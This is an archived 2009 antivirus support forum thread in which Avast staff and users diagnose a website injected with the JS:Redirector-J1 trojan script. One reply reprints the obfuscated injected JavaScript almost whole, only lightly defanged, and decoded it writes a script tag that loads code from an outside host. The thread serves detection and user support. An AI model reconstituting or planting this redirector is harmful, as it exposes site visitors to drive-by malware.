Author Topic: JS:Redirector-J1 [Trj]  (Read 9071 times)

0 Members and 1 Guest are viewing this topic.

AdamWarlock

  • Guest
JS:Redirector-J1 [Trj]
« on: May 20, 2009, 02:10:50 PM »
Has this site been hacked or is this a false positive?
wXw.http://www.comixfan.com/xfan/forums/index.php?
How would I go about finding out?
Thanks. :P

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: JS:Redirector-J1 [Trj]
« Reply #1 on: May 20, 2009, 02:28:14 PM »
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
Maybe you could contact its webmaster.
The best things in life are free.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: JS:Redirector-J1 [Trj]
« Reply #2 on: May 20, 2009, 02:41:52 PM »
Although, I did not find anything strange in the page code (obfuscated scripts).

Maybe this one...
Code: [Select]
</head><script language=javascript><!--
(function(xtVNA){var DLyKr='%';var h5x5=('#76ar#20#61#3d <edited> (h5x5))})(/\#/g);
 --></script>
« Last Edit: May 20, 2009, 07:51:22 PM by Tech »
The best things in life are free.

Offline jsejtko

  • Avast team
  • Full Member
  • *
  • Posts: 171
    • ALWIL Software
Re: JS:Redirector-J1 [Trj]
« Reply #3 on: May 20, 2009, 02:47:01 PM »
Hello,

Maybe this one...

Yes, that one :) - similar script to JS:Redirector-H (and its variants), just new target url where ppl are redirected and little change in the code.

Regards

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: JS:Redirector-J1 [Trj]
« Reply #4 on: May 20, 2009, 03:03:36 PM »
Good work avast team...
It's being a very good improvement on avast compared to other antivirus.
The best things in life are free.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89167
  • No support PMs thanks
Re: JS:Redirector-J1 [Trj]
« Reply #5 on: May 20, 2009, 03:54:23 PM »
Tech I think that you should modify the actual script, the last thing we want is for avast to alert on the forums.

e.g.
Code: [Select]
</head>^EDITEDscript language=javaEDITEDscript^<!--
(EDITEDfunction(xtVNA){var DLyKr='%';var5x5=('#76ar#20#61#3d#22#53cri#70tE
#6egine#22#2cb#3d#22Ve#72#73i#6fn()+#22#2cj#3d#22#22#2cu#3dnav#69#67ator#2euserAge#6et#3bif((#75#2eindexOf(#22Chro#6d#65#22)#3c0)#26#26
(u#2eindex#4ff(#22#57i#6e#22)#3e0)#26#26(#75#2ein#64e#78O#66(#22NT#206#22)#3c#30)#26#26(#64o#63um#65nt#2e#63#6fokie#2eind#65xOf(#22#6
diek#3d1#22#29#3c0#29#26#26(typeo#66(zr#76z#74#73#29#21#3dtyp#65o#66(#22#41#22))#29#7bzrvzt#73#3d#22#41#22#3beval(#22if(w#69#6edow#2e
#22+#61+#22)j#3dj#2b#22+a+#22#4dajor#22+#62+a+#22Minor#22+b+a+#22B#75#69ld#22+b+#22#6a#3b#22)#3bd#6fcument#2e#77r#69te(#22#3csc#72ip
#74#20s#72c#3d#2f#2fmar#22+#22#74uz#2e#63n#2f#76#69d#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fscript#3e#22)#3b#7d').replace(xtVNA,DLyKr);
eval(uneEDITEDscape(h5x5))})(/\#/g);
 -->^EDITED/scriptEDITED^

Whilst that might not have happened in this case it is a good habit to get into, not posting the complete unmodified script. This is why I tend to post images.
« Last Edit: May 20, 2009, 03:59:27 PM by DavidR »
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.4.6112 (build 24.4.9067.762) UI 1.0.803/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: JS:Redirector-J1 [Trj]
« Reply #6 on: May 20, 2009, 04:31:05 PM »
Even it's not a live link? Nobody could click on the script url...
The best things in life are free.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89167
  • No support PMs thanks
Re: JS:Redirector-J1 [Trj]
« Reply #7 on: May 20, 2009, 05:10:58 PM »
It has nothing to do with a live link, what the avast detection is on is the obfuscated javascript tag.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.4.6112 (build 24.4.9067.762) UI 1.0.803/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: JS:Redirector-J1 [Trj]
« Reply #8 on: May 20, 2009, 05:35:04 PM »
It has nothing to do with a live link, what the avast detection is on is the obfuscated javascript tag.
But it is a text only here... ???
The best things in life are free.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89167
  • No support PMs thanks
Re: JS:Redirector-J1 [Trj]
« Reply #9 on: May 20, 2009, 05:41:10 PM »
That hasn't stopped avast alerting on scripts before I found that out the hard way and that was when the offending script was in a code tag even when split over two code tags with no other obfuscation avast still alerted and basically I had to remove it completely.

That is why I changed over to using images to display the offending script as that was actually quicker than say changing the < and > tags for ^ and ^ and bunging in EDITED between essential commands as in my example above.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.4.6112 (build 24.4.9067.762) UI 1.0.803/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline jsejtko

  • Avast team
  • Full Member
  • *
  • Posts: 171
    • ALWIL Software
Re: JS:Redirector-J1 [Trj]
« Reply #10 on: May 20, 2009, 05:51:34 PM »
Quote
But it is a text only here...

I must agree with DavidR - html code, javascript, php - all of these things are just text. From the scanner point of view it is very hard to find the way to distinguish between real scripts and scripts placed into forums.

If you can copy&paste its body, its still virus/trojan.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Re: JS:Redirector-J1 [Trj]
« Reply #11 on: May 20, 2009, 06:46:55 PM »
Hi Tech,

That was just what I was going on about in another posting, the difference between this malcode not depending of OS or software, and malware that depends on a particular OS or software. Not often av-users are unaware of this difference. So that is the basic difference between malcode and virus,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

AdamWarlock

  • Guest
Re: JS:Redirector-J1 [Trj]
« Reply #12 on: May 21, 2009, 09:39:41 AM »
Thanks for the help guys.  :)
Can anyone tell me what this particular virus does? or wants to do? :-[
I mean i understand its a trojan but what does the malware that it installs do? ???

Offline igor

  • Avast team
  • Serious Graphoman
  • *
  • Posts: 11855
    • AVAST Software
Re: JS:Redirector-J1 [Trj]
« Reply #13 on: May 21, 2009, 09:50:31 AM »
It's hard to say. As the name suggests, the script redirects you to some strange (often Chinese) page; what would load from there... can be anything (and can change any minute).

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89167
  • No support PMs thanks
Re: JS:Redirector-J1 [Trj]
« Reply #14 on: May 21, 2009, 05:17:14 PM »
Thanks for the help guys.  :)
Can anyone tell me what this particular virus does? or wants to do? :-[

You're welcome.

As Igor said, the source and content at the site could be changed in minutes so there is no consistency in what payload might be there. All avast is doing is alerting to this (hacked site) and blocking the possibility of exposure to whatever that payload 'might' be.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.4.6112 (build 24.4.9067.762) UI 1.0.803/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security